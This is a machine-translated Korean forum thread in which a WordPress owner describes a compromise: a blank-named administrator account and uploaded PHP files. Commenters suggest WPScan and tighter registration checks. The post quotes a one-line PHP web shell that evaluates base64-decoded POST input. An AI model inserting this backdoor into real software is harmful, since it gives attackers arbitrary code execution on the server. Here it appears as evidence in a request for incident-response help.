0
wordfence 플러그인에서 사용자 (비어있는 사용자 이름)가 관리 영역에 로그인되었다는 이메일을 받았습니다.Wordpress admin hacked
A user with username " " who has administrator access signed in to your WordPress site.
사용자에게는 데이터가 전혀없는 새로운 사용자가 있습니다. 이메일, 사용자 이름 등은 모두 비어 있습니다. 이것이 첫 번째 문제입니다. 두 번째 문제는
일부 PHP 파일
는/WP - 콘텐츠/업로드/2014/03 폴더하는 후 dir.php과 841rewb3v4x.php에 업로드되었습니다 .... 아마이 하나의 결과입니다 후 dir.php 여기 http://www.unphp.net/decode/f845fc88a23b7a59b3f5c04ed09cf7b0/
누군가가 알고 있다면 찾을 수 있습니다 다른 파일이 PHP 코드를 인코딩 한
<?php eval(base64_decode($_POST['n358cfa']));?>
다음 코드, 그 코드가 무엇을 가지고? 또한, 내가 그것에 대해해야 할 일은 무엇입니까? (나는 이미 사용자와 파일을 삭제했다).
감사합니다.
는 보안 위험을 이잖아. 가입 시스템에 누수가있는 것 같습니다. – MTM
http://wpscan.org/에서 취약성을 확인하십시오 .. 등록 시스템 및/또는 일부 플러그인에 누수가있을 수 있습니다. –
사용자를 삭제하고 파일을 삭제 한 경우 더 많은 작업을 수행 할 수 있습니다. 어쩌면 PHP 작성 계정 양식을 수정하여 이메일 주소/비밀번호가없는 사용자를 차단할 수 있습니다. – cybermonkey